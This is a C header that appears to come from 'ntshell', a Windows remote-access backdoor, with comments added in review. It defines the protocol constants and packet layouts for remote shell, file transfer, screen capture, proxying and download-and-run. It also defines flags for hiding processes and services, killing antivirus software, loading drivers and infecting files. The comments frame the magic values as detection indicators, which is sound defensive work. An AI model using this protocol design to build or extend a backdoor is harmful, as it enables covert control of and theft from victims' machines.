// ntshell.h - protocol constants and wire-structure layouts, presumably shared
// by the ntshell client and server (the header declares ClientVersion /
// ServerVersion fields but no functions). Everything here is plain data: no
// logic, no allocation. Several structures end in a flexible array member, so
// sizeof() covers only the fixed prefix and instances live inside a larger
// send/receive buffer. From a defensive standpoint, the fixed magic values,
// flag names and the service name below are stable indicators a detection
// engineer can key on.
#if !defined(ntshell_h)
#define ntshell_h
// An undefined macro evaluates to 0 in #if, so this block is skipped outside MSVC.
#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000
// C4200 is MSVC's "zero-sized array in struct/union" warning, raised by the
// trailing `[]` members declared below; it is silenced here for C++ builds only.
#ifdef __cplusplus
#pragma warning(disable : 4200)
#endif
// Protocol version, packed as (major << 8) | minor; with the values given this
// is 78, which fits the WORD ClientVersion / ServerVersion fields below.
#define NTSHELL_MINORVERSION 78
#define NTSHELL_MAJORVERSION 0
#define NTSHELL_VERSION (NTSHELL_MINORVERSION | (NTSHELL_MAJORVERSION << 8))
// Configuration item identifiers (0..12). The storage they index is not visible
// in this header; CONFIG_SECTION_SIZE further down is presumably related - confirm.
#define CFG_BEGIN 0
#define CFG_END 1
#define CFG_MASTER_ADDR 2
#define CFG_MASTER_ADDR2 3
#define CFG_MASTER_PORT 4
#define CFG_LISTEN_PORT 5
#define CFG_WAIT_MODE 6
#define CFG_NEED_PWD 7
#define CFG_PASSWORD 8
#define CFG_GLOBAL_FLAGS 9
#define CFG_CONN_SPACE 10
#define CFG_PORT_HIJACK 11
#define CFG_RUN_METHOD 12
// 32-bit magic values used as work-type selectors and control codes. They are
// presumably exchanged on the wire; the framing that carries them is not shown
// here (PACK_TYPE_1 / PACK_TYPE_2 below are the only frame layouts declared).
#define WORK_CONSOLE 0x5c698ea0
#define WORK_CMDSHELL 0x32279732
#define WORK_FILEMANAGER 0x835d2b99
#define WORK_SOCKPROXY 0xf2795541
#define WORK_SCREENCAPTURE 0xdc46070e
#define WORK_PROCESSMANAGER 0xcba01986
#define CONTROL_NEWCONNECT 0x5aba7788
#define CONTROL_QUERYINFO 0x58437964
#define CONTROL_NONE 0x12345678
// CONTROL_REBOOT..CONTROL_SHUTDOWN are consecutive values 0x774055a1..0x774055a5.
#define CONTROL_REBOOT 0x774055a1
#define CONTROL_UPDATE 0x774055a2
#define CONTROL_UNINSTALL 0x774055a3
#define CONTROL_EXIT 0x774055a4
#define CONTROL_SHUTDOWN 0x774055a5
// Connection-phase responses; by their names, password requested / rejected.
#define CONNECT_NEED_PWD 0x86570422
#define CONNECT_INVALID_PWD 0xffff0000
// Small-integer command ids. Note that CONSOLE_* further down reuses values
// 1..6 with partly different names; the two sets should not be mixed without
// checking the dispatcher.
#define CMD_LISTPROCESS 1
#define CMD_KILLPROCESS 2
#define CMD_DOWNLOADFILE 3
#define CMD_EXECUTE 4
#define CMD_NEWINSTANCE 5
#define CMD_RUNCOMMAND 6
#define CMD_SHELLSESSION 7
#define CMD_SOCKPROXY 8
#define CMD_EXITCONSOLE 9
#define STATE_READY 0
// Handshake magics: ask / answer / ok triples for CONN1 and CONN2, answer / ok
// pairs for CONN3 and CONN4. Which connection mode each set belongs to is not
// shown here. Fixed handshake constants like these are classic network-
// signature material.
#define CONN1_SLAVE_ASK 0x5468e21a
#define CONN1_MASTER_ANSWER 0x7714e029
#define CONN1_SLAVE_OK 0xff3a6bd6
#define CONN2_SLAVE_ASK 0x23516def
#define CONN2_MASTER_ANSWER 0x87654321
#define CONN2_SLAVE_OK 0xa3d51234
#define CONN3_MASTER_ANSWER 0x8566cae0
#define CONN3_SLAVE_OK 0x63374899
#define CONN4_MASTER_ANSWER 0x87845678
#define CONN4_SLAVE_OK 0x87654878
// Bit flags (powers of two, 1..1024); presumably the value set carried by the
// CFG_GLOBAL_FLAGS item - confirm against the configuration reader. Several of
// the capabilities named here (process/service hiding, driver loading, AV
// termination, file infection) are themselves behavioural indicators.
#define FLAG_ALLOW_HIDE_PROCESS 1
#define FLAG_ALLOW_RING0 2
#define FLAG_RUN_SERVICE_ALWAYS 4
#define FLAG_AUTO_KILL_AVSOFT 8
#define FLAG_AUTO_INFECT_FILE 16
#define FLAG_AUTO_INFECT_LAN_FILE 32
#define FLAG_RECORD_ERROR 64
#define FLAG_ALLOW_LOAD_DRIVER 128
#define FLAG_ALLOW_HIDE_SERVICE 256
#define FLAG_RING0_OPEN_FILE 512
#define FLAG_AUTO_BACKUP_FILE 1024
// Command completion states. NOTE(review): CONTROL_DISCONNECT sits in this
// 0/1/2 sequence rather than with the 0x7740xxxx CONTROL_* codes above; its
// name suggests a control code but its value suggests a third completion
// state - verify which meaning the users rely on.
#define COMMAND_PENDING 0
#define COMMAND_FINISH 1
#define CONTROL_DISCONNECT 2
// Fixed buffer sizes. Writers into MAX_ADDRESS_LENGTH / MAX_PASSWORD_LENGTH
// sized buffers must truncate and NUL-terminate (see PROXYERR_ADDRTOOLONG below).
#define BUFFER_SIZE 4096
#define MAX_ADDRESS_LENGTH 64
#define MAX_PASSWORD_LENGTH 32
#define CONFIG_SECTION_SIZE 256
// Windows service name; where it is registered is not shown in this header.
// A fixed service name is a host-based indicator.
#define SERVICE_NAME "ntwscsvc"
// Generic request envelope: an 8-byte header of four WORDs followed by a
// flexible array, so sizeof covers the header only and instances are only
// ever addressed inside a larger buffer.
// RequestClass presumably selects one of the per-subsystem ids below
// (FILEMGR_*, PROCMGR_*, CONSOLE_*, ...) - confirm against the dispatcher.
// NOTE(review): the payload is declared as an array of PVOID, which makes its
// element size depend on the target's pointer width; if this struct is sent
// between processes of different bitness the payload should be treated as raw
// bytes instead. Confirm how callers index Request[].
typedef struct _NTSHELL_REQUEST
{
WORD ClientVersion;
WORD RequestClass;
WORD Reserved;
WORD Reserved2;
PVOID Request[];
} NTSHELL_REQUEST, *PNTSHELL_REQUEST;
// Generic reply envelope: 16-byte header (four WORDs, two DWORDs) followed by a
// flexible array of results; sizeof covers the header only.
// MessageCode presumably carries one of the MSG_* values at the end of this
// file - confirm. Same PVOID-payload caveat as NTSHELL_REQUEST.
// Defensive handling: NumberOfResults arrives from the peer and must be
// bounded by the bytes actually received before ResultSet[] is walked.
typedef struct _NTSHELL_RESULTSET
{
WORD ServerVersion;
WORD ResultClass;
WORD MessageCode;
WORD Reserved;
DWORD ErrorCode;
DWORD NumberOfResults;
PVOID ResultSet[];
} NTSHELL_RESULTSET, *PNTSHELL_RESULTSET;
//////////////////////////////////////////////////////////////////////
// 文件管理器接口
//////////////////////////////////////////////////////////////////////
// File-manager request ids (1..12); presumably the RequestClass values used
// under WORK_FILEMANAGER - confirm against the dispatcher. The request /
// reply bodies for them are the FILEMGR_* structures that follow.
#define FILEMGR_LISTDRIVE 1
#define FILEMGR_LISTFILE 2
#define FILEMGR_GETFILEICON 3
#define FILEMGR_CREATEDIRECTORY 4
#define FILEMGR_REMOVEDIRECTORY 5
#define FILEMGR_READFILE 6
#define FILEMGR_WRITEFILE 7
#define FILEMGR_EXECUTEFILE 8
#define FILEMGR_DELETEFILE 9
#define FILEMGR_COPYFILE 10
#define FILEMGR_MOVEFILE 11
#define FILEMGR_SIMPLYREADFILE 12
// One directory entry: a 28-byte fixed part (DWORD, two 8-byte FILETIMEs, two
// DWORDs) followed by the name as a flexible CHAR array. The attribute, time
// and split high/low size fields mirror the shape of WIN32_FIND_DATA.
// Defensive handling: when an entry arrives from the peer, FileName cannot be
// assumed NUL-terminated within the received length - bound any strlen/strcpy
// on it by the remaining buffer.
typedef struct _FILEMGR_FILEINFO
{
DWORD FileAttributes;
FILETIME CreationTime;
FILETIME LastWriteTime;
DWORD FileSizeHigh;
DWORD FileSizeLow;
CHAR FileName[];
} FILEMGR_FILEINFO, *PFILEMGR_FILEINFO;
// One drive entry, fixed size (no flexible member): type, root path, label,
// serial, filesystem name and two 64-bit byte counts.
// The three CHAR buffers are fixed at 40 / 16 / 16 bytes; the producer must
// truncate and NUL-terminate (volume labels can be longer than 15 chars), and
// a consumer should not assume termination for data that came off the wire.
typedef struct _FILEMGR_DRIVEINFO
{
DWORD DriveType;
CHAR RootPathName[40];
CHAR VolumeName[16];
DWORD VolumeSerialNumber;
CHAR FileSystemName[16];
ULARGE_INTEGER TotalNumberOfBytes;
ULARGE_INTEGER TotalNumberOfFreeBytes;
} FILEMGR_DRIVEINFO, *PFILEMGR_DRIVEINFO;
// Icon bitmap reply: 6-byte header (three WORDs) followed by pixel data.
// There is no explicit byte count; the reader must derive the expected size
// from Width, Height and BitCount and bound it by the bytes actually received.
typedef struct _FILEMGR_FILEICON
{
WORD Width;
WORD Height;
WORD BitCount;
BYTE Bits[];
} FILEMGR_FILEICON, *PFILEMGR_FILEICON;
// File-content reply for FILEMGR_READFILE: a MAX_PATH name buffer, a 32-bit
// size, two FILETIMEs, then the file bytes. The layout is identical to
// FILEMGR_FILEWRITE below; only the direction differs.
// Defensive handling: FileSize comes from the peer and must be checked against
// the received length before FileData is read; FileName is a fixed buffer and
// may not be NUL-terminated.
typedef struct _FILEMGR_FILEREAD
{
CHAR FileName[MAX_PATH];
DWORD FileSize;
FILETIME CreationTime;
FILETIME LastWriteTime;
BYTE FileData[];
} FILEMGR_FILEREAD, *PFILEMGR_FILEREAD;
// File-content request for FILEMGR_WRITEFILE; same layout as FILEMGR_FILEREAD
// (MAX_PATH name, 32-bit size, two FILETIMEs, then the bytes).
// Defensive handling: FileSize and FileName arrive from the peer - bound
// FileSize by the received length and treat FileName as possibly unterminated
// before it is used as a path.
typedef struct _FILEMGR_FILEWRITE
{
CHAR FileName[MAX_PATH];
DWORD FileSize;
FILETIME CreationTime;
FILETIME LastWriteTime;
BYTE FileData[];
} FILEMGR_FILEWRITE, *PFILEMGR_FILEWRITE;
// A single variable-length path, reachable under two member names that share
// the same offset and type (the union adds no layout).
// NOTE(review): this is not standard C - a flexible array member is only
// permitted as the last member of a struct that has at least one other named
// member, and not inside a union at all. It compiles only via MSVC's
// zero-sized-array extension (the C4200 warning silenced at the top of the
// file); with GCC/Clang in -std=c11 mode the declaration is rejected. A
// portable replacement would keep a single `CHAR FileName[]` after a real
// leading member, but that changes sizeof and the PathName alias, so it is
// left as-is here.
typedef struct _FILEMGR_FILENAME
{
union
{
CHAR FileName[];
CHAR PathName[];
};
} FILEMGR_FILENAME, *PFILEMGR_FILENAME;
// Two fixed MAX_PATH name buffers; presumably source / destination for
// FILEMGR_COPYFILE and FILEMGR_MOVEFILE - confirm against the handler.
// Fixed buffers: neither is guaranteed NUL-terminated when received.
typedef struct _FILEMGR_FILENAME2
{
CHAR FileName1[MAX_PATH];
CHAR FileName2[MAX_PATH];
} FILEMGR_FILENAME2, *PFILEMGR_FILENAME2;
//////////////////////////////////////////////////////////////////////
// 进程管理器接口
//////////////////////////////////////////////////////////////////////
// Process-manager request ids (1..4); presumably the RequestClass values used
// under WORK_PROCESSMANAGER - confirm. Bodies are the PROCMGR_* structs below.
#define PROCMGR_LISTPROCESS 1
#define PROCMGR_KILLPROCESS 2
#define PROCMGR_RUN 3
#define PROCMGR_FORCEKILLPROCESS 4
// One process-list entry: 44 bytes fixed (two LARGE_INTEGERs, five ULONGs,
// four USHORTs). The variable-length strings are not part of the struct;
// the OffsetOf* fields locate them, and OffsetOfNextEntry chains entries,
// which resembles the NextEntryOffset convention of the NT process-information
// records - presumably offsets are relative to the start of this entry; confirm.
// Defensive handling: every offset is 16-bit and arrives from the peer, so a
// reader must validate each one (and the NUL-termination of the string it
// points at) against the remaining buffer before following it. The ULONG size
// fields are 32-bit and may not represent large processes - verify the producer.
typedef struct _PROCMGR_PROCESSINFO
{
LARGE_INTEGER ProcessCreateTime;
LARGE_INTEGER ProcessCpuTime;
ULONG BasePriority;
ULONG ProcessId;
ULONG ParentProcessId;
ULONG TotalVirtualSizeBytes;
ULONG TotalPrivateBytes;
USHORT OffsetOfNextEntry;
USHORT OffsetOfProcessName;
USHORT OffsetOfUserName;
USHORT OffsetOfImagePath;
} PROCMGR_PROCESSINFO, *PPROCMGR_PROCESSINFO;
// Target of PROCMGR_KILLPROCESS / PROCMGR_FORCEKILLPROCESS: a single process id.
// CONSOLE_PROCESSKILL further down has the identical layout.
typedef struct _PROCMGR_PROCESSKILL
{
ULONG ProcessId;
} PROCMGR_PROCESSKILL, *PPROCMGR_PROCESSKILL;
// Body of PROCMGR_RUN: a 4-byte header (ShowWindow plus a padding WORD) and a
// flexible CHAR path. ShowWindow is presumably an SW_* show-window value -
// confirm. ImagePath comes from the peer and is not guaranteed NUL-terminated
// within the received length.
typedef struct _PROCMGR_PROCESSRUN
{
WORD ShowWindow;
WORD Reserved;
CHAR ImagePath[];
} PROCMGR_PROCESSRUN, *PPROCMGR_PROCESSRUN;
//////////////////////////////////////////////////////////////////////
// 控制台接口
//////////////////////////////////////////////////////////////////////
// Console request ids (1..6); presumably the RequestClass values used under
// WORK_CONSOLE - confirm. Values 1..3 coincide with CMD_LISTPROCESS..
// CMD_DOWNLOADFILE at the top of the file, but 4..6 carry different names, so
// the two sets are not interchangeable.
#define CONSOLE_LISTPROCESS 1
#define CONSOLE_KILLPROCESS 2
#define CONSOLE_DOWNLOADFILE 3
#define CONSOLE_EXECUTE_1 4
#define CONSOLE_EXECUTE_2 5
#define CONSOLE_SENDMESSAGE 6
// Target of CONSOLE_KILLPROCESS: a single process id. Same layout as
// PROCMGR_PROCESSKILL.
typedef struct _CONSOLE_PROCESSKILL
{
ULONG ProcessId;
} CONSOLE_PROCESSKILL, *PCONSOLE_PROCESSKILL;
// Body of CONSOLE_DOWNLOADFILE: fixed-size, two MAX_PATH buffers and a BOOL.
// Both strings arrive from the peer and may fill their buffer without a NUL;
// a handler must bound them before use. RunIt is a full 32-bit BOOL, not a
// bit-field, so any non-zero value reads as true.
typedef struct _CONSOLE_FILEDOWNLOAD
{
CHAR Url[MAX_PATH];
CHAR SavePath[MAX_PATH];
BOOL RunIt;
} CONSOLE_FILEDOWNLOAD, *PCONSOLE_FILEDOWNLOAD;
// Body of CONSOLE_EXECUTE_1 / CONSOLE_EXECUTE_2: 8-byte header (BOOL, DWORD)
// and a flexible command-line string. The unit of TimeOut is not stated here
// (presumably milliseconds - confirm). CommandLine is peer-supplied and not
// guaranteed NUL-terminated within the received length.
typedef struct _CONSOLE_EXECUTE
{
BOOL ShowResult;
DWORD TimeOut;
CHAR CommandLine[];
} CONSOLE_EXECUTE, *PCONSOLE_EXECUTE;
// Body of CONSOLE_SENDMESSAGE: a 32-bit display selector and a flexible
// message string. The DisplayMethod values are not defined in this header.
// MessageText is peer-supplied and may lack a terminating NUL.
typedef struct _CONSOLE_MESSAGESEND
{
ULONG DisplayMethod;
CHAR MessageText[];
} CONSOLE_MESSAGESEND, *PCONSOLE_MESSAGESEND;
//////////////////////////////////////////////////////////////////////
// 屏幕监视接口
//////////////////////////////////////////////////////////////////////
// Screen-frame encoding methods; presumably the values carried in
// SCREENCAP_SCREENBITMAP.Method (full frame, difference, xor) - confirm.
#define SCREEN_FULL 1
#define SCREEN_DIFFERENCE 2
#define SCREEN_XOR 3
// One captured frame: 12-byte header (four WORDs and a DWORD) followed by
// pixel data. Size gives the byte count of Bits; Method is presumably one of
// the SCREEN_* values above.
// Defensive handling: Size, Width, Height and Depth all arrive from the peer;
// a receiver must check Size against the bytes actually received and against
// what Width * Height * Depth implies before decoding.
typedef struct _SCREENCAP_SCREENBITMAP
{
WORD Width;
WORD Height;
WORD Depth;
WORD Method;
DWORD Size;
BYTE Bits[];
} SCREENCAP_SCREENBITMAP, *PSCREENCAP_SCREENBITMAP;
//////////////////////////////////////////////////////////////////////
// 端口代理服务接口
//////////////////////////////////////////////////////////////////////
// Port-proxy result codes. PROXYERR_ADDRTOOLONG presumably corresponds to an
// address exceeding MAX_ADDRESS_LENGTH - confirm against the proxy code.
#define PROXYERR_SUCCESS 0
#define PROXYERR_ADDRTOOLONG 1
#define PROXYERR_OPENPORTFAILED 2
//////////////////////////////////////////////////////////////////////
// IO数据包格式
//////////////////////////////////////////////////////////////////////
// Framed packet, type 1: one 32-bit word holding a 2-bit type and a 30-bit
// size, then the payload; sizeof covers the 4-byte header only.
// Bit-field placement within the word is compiler-defined (MSVC and GCC on x86
// assign from the least significant bit), so this layout is only portable
// between builds that agree on it.
// Defensive handling: nPackSize arrives from the peer; a receiver must bound
// it by the bytes actually received before touching bPackData, and the 30-bit
// width (up to 1 GiB) is not by itself a safe allocation limit.
typedef struct _PACK_TYPE_1
{
DWORD dwPackType : 2;
DWORD nPackSize : 30;
BYTE bPackData[];
} PACK_TYPE_1, *PPACK_TYPE_1;
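// Framed packet, type 2: a 2-bit type / 30-bit size word, a checksum word
// (presumably CRC-32 of the payload, by its name), a flag / original-size
// word, then the payload. The header is three 32-bit words (12 bytes) and
// sizeof covers the header only.
// bCompressed / bEncrypted are declared DWORD rather than BOOL on purpose:
// BOOL is a signed int, and a 1-bit signed bit-field can only hold 0 and -1
// on MSVC and GCC, so a test such as `bCompressed == TRUE` would never be
// true. BOOL and DWORD are both 4 bytes, so the three bit-fields still share
// one 32-bit allocation unit and the byte layout on the wire is unchanged.
// Bit placement within a word is compiler-defined (MSVC and GCC on x86 assign
// from the least significant bit).
// Defensive handling: nPackSize, nOriginalSize and both flags come from the
// peer. Bound nPackSize by the bytes actually received, bound nOriginalSize
// by the decompression output buffer, and verify dwCrc32 before acting on
// the payload.
typedef struct _PACK_TYPE_2
{
DWORD dwPackType : 2;
DWORD nPackSize : 30;
DWORD dwCrc32;
DWORD bCompressed : 1;
DWORD bEncrypted : 1;
DWORD nOriginalSize : 30;
BYTE bPackData[];
} PACK_TYPE_2, *PPACK_TYPE_2;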
//////////////////////////////////////////////////////////////////////
// 系统信息查询接口
//////////////////////////////////////////////////////////////////////
// System-information query classes (0..8); presumably used under
// CONTROL_QUERYINFO with QUERY_INFORMATION / QUERY_RESULTSET below - confirm.
// QUERY_ENDQUERY (0) reads as a terminator for a query sequence.
#define QUERY_ENDQUERY 0
#define QUERY_PROCESSORNAME 1
#define QUERY_PROCESSORMHZ 2
#define QUERY_PHYSMEMORYSIZE 3
#define QUERY_SYSTEMVERSION 4
#define QUERY_COMPUTERNAME 5
#define QUERY_CURRENTUSERNAME 6
#define QUERY_SYSTEMROOT 7
#define QUERY_NTSHELLVERSION 8
// Query request: a single WORD naming one of the QUERY_* classes above.
typedef struct _QUERY_INFORMATION
{
WORD InformationClass;
} QUERY_INFORMATION, *PQUERY_INFORMATION;
// Query reply: 4-byte header (class, byte length) followed by the value.
// The encoding of Information (string vs. integer) depends on the class and
// is not specified here.
// Defensive handling: InformationLength arrives from the peer and must be
// bounded by the received length; string results should not be assumed
// NUL-terminated.
typedef struct _QUERY_RESULTSET
{
WORD InformationClass;
WORD InformationLength;
BYTE Information[];
} QUERY_RESULTSET, *PQUERY_RESULTSET;
//////////////////////////////////////////////////////////////////////
// 服务端消息代码
//////////////////////////////////////////////////////////////////////
// Server message codes; presumably carried in NTSHELL_RESULTSET.MessageCode
// - confirm.
#define MSG_NONE 0
#define MSG_RING0_DISABLED 1
#endif // ntshell_h